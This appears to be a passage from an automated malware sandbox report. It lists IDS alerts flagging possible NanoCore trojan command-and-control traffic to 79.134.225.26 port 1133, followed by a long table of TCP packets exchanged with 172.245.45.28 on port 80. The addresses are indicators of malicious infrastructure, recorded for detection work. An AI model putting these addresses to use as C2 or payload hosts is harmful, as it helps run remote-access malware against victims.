05/03/21-10:45:36.432645	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49176	1133	192.168.2.22	79.134.225.26
05/03/21-10:45:42.751078	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49177	1133	192.168.2.22	79.134.225.26
05/03/21-10:45:48.985174	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49178	1133	192.168.2.22	79.134.225.26
05/03/21-10:45:55.280626	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49179	1133	192.168.2.22	79.134.225.26
05/03/21-10:46:01.572522	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49180	1133	192.168.2.22	79.134.225.26
05/03/21-10:46:07.800279	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49181	1133	192.168.2.22	79.134.225.26
05/03/21-10:46:13.974353	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49182	1133	192.168.2.22	79.134.225.26

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2021 10:44:28.384494066 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:28.588821888 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:28.588920116 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:28.589329004 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:28.813957930 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:28.813988924 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:28.814012051 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:28.814028025 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:28.814033985 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:28.814073086 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:28.814078093 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.015441895 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.015480995 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.015503883 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.015531063 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.015551090 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.015572071 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.015593052 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.015614033 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.015618086 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.015661001 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.216788054 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.216814995 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.216831923 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.216847897 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.216898918 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.216931105 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.217200994 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.217221975 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.217238903 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.217255116 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.217268944 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.217272043 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.217282057 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.217292070 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.217297077 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.217312098 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.217315912 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.217329025 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.217330933 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.217348099 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.217350006 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.217367887 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.217369080 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.217377901 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.217405081 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.219049931 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418195963 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418222904 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418237925 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418257952 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418276072 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418292046 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418311119 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418324947 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418329000 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418346882 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418354988 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418359041 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418365002 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418384075 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418391943 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418397903 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418401957 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418406010 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418417931 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418426991 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418443918 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418445110 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418457985 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418466091 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418483019 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418490887 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418502092 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418509960 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418519020 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418524981 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418541908 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418557882 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418572903 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418586969 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418602943 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418612957 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418616056 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418631077 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418633938 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418648005 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418652058 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418665886 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418673992 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418680906 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418692112 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418709040 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.418715000 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418732882 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.418746948 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.421420097 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.620978117 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621009111 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621026039 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621042013 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621058941 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621079922 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621099949 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621115923 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621133089 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621149063 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621165991 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621184111 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621186972 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621201992 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621223927 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621226072 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621231079 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621233940 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621237040 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621243000 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621258974 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621267080 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621277094 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621279001 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621294022 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621294022 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621309996 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621310949 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621326923 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621331930 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621342897 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621349096 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621362925 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621370077 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621377945 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621406078 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621409893 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621424913 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621440887 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621440887 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621457100 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621459007 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621471882 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.621475935 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621490955 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.621587038 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.623656988 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.626252890 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626276016 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626291990 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626312017 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626331091 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626348019 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626367092 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626372099 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.626384974 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626404047 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626405954 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.626410007 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.626413107 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.626421928 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626421928 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.626435995 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.626439095 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626452923 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.626460075 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626471043 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.626478910 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626487017 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.626497030 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626513004 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626526117 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.626529932 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626542091 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.626548052 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626557112 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.626564980 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626583099 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626584053 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.626599073 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.626602888 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.626612902 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.626638889 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.629417896 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.822752953 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.822786093 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.822809935 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.822833061 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.822849989 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.822865963 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.822881937 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.822897911 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.822972059 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.824839115 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.824852943 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.824886084 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.824904919 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.824923038 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.824934006 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.824939013 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.824958086 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.824958086 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.824975967 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.824978113 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.824992895 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.824996948 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.825010061 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.825016022 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.825028896 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.825033903 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.825051069 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.825052023 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.825071096 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.825076103 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.825088024 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.825095892 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.825105906 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.825110912 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.825124979 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.825126886 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.825138092 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.825149059 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.825155973 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.825165987 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.825176001 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.825185061 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.825200081 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.825201988 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.825217009 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.825218916 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.825234890 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.825253963 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.825993061 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.830529928 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830557108 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830569983 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830584049 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830596924 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830615044 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830631018 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830647945 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830665112 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830679893 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830696106 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830712080 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830733061 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830749989 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830748081 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.830765963 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830784082 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830801964 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830816984 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830833912 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830849886 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:29.830943108 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.830956936 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.830961943 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.830965042 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.830966949 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.830967903 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.830970049 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.830971956 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.830974102 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.830975056 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:29.834018946 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.024339914 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.024368048 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.024385929 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.024401903 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.024418116 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.024429083 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.024439096 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.024455070 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.024458885 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.024461031 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.024476051 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.024481058 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.024502993 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.024518013 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026195049 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026223898 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026240110 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026248932 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026262045 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026268005 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026278019 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026281118 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026294947 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026298046 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026312113 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026318073 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026329994 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026335955 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026348114 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026354074 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026365042 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026371956 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026388884 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026390076 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026408911 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026412964 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026423931 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026432991 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026448965 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026458979 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026465893 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026468039 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026485920 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026487112 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026503086 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026504993 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026521921 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026523113 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026537895 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026540995 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026556969 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026562929 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026573896 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026582003 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026599884 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026601076 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026618004 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026618004 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026637077 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026639938 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026653051 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026655912 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026671886 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026674032 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026690006 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026690960 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026709080 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026712894 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026726007 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026731014 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026745081 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026748896 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026762962 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.026767015 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.026778936 CEST	49166	80	192.168.2.22	172.245.45.28
